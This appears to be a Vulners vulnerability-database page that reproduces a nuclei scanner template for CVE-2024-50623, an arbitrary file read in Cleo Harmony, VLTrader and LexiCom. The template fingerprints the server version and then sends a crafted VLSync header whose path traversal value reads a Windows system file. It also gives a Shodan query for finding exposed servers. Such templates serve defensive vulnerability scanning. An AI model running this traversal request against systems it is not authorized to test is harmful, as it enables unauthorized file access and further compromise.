Lucene search
K

Cleo Harmony < 5.8.0.21 - Arbitary File Read

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 69 Views

Cleo Harmony versions < 5.8.0.21 allow arbitrary file read leading to remote code execution.

Related
Refs
Code
id: CVE-2024-50623

info:
  name: Cleo Harmony < 5.8.0.21 - Arbitary File Read
  author: DhiyaneshDK
  severity: high
  description: |
    In Cleo Harmony before 5.8.0.21, VLTrader before 5.8.0.21, and LexiCom before 5.8.0.21, there is an unrestricted file upload and download that could lead to remote code execution.
  impact: |
    Attackers can exploit vulnerabilities to compromise the system.
  remediation: |
    Update to the latest patched version addressing CVE-2024-50623.
  reference:
    - https://support.cleo.com/hc/en-us/articles/27140294267799-Cleo-Product-Security-Advisory
    - https://github.com/watchtowrlabs/CVE-2024-50623
    - https://labs.watchtowr.com/cleo-cve-2024-50623/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-50623
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-50623
    cwe-id: CWE-434
    epss-score: 0.98529
    epss-percentile: 0.99915
  metadata:
    verified: true
    max-request: 2
    shodan-query: 'Server: Cleo'
  tags: cve,cve2024,cleo,vltrader,lexicom,harmony,lfi,kev,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /Synchronization HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(response), "cleo")'
        internal: true

    extractors:
      - type: regex
        name: version
        part: header
        group: 1
        regex:
          - "Server: Cleo.*?/([0-9.]+)"
        internal: true

  - raw:
      - |
        GET /Synchronization HTTP/1.1
        Host: {{Hostname}}
        VLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v={{version}};a=1337;po=5080;s=True;b=False;pp=myEncryptedPassphrase;path=..\..\..\windows\win.ini

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4a0a00473045022100af37f461130674ede10378d68c532556a428607f405b23a529ba9a769ec6835f02207edb2c6a95ace5829880cda395c17ea5566c47bf47fcd814886ddb01523acb98:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
9High risk
Vulners AI Score9
CVSS 3.19.8
EPSS0.98529
SSVC
69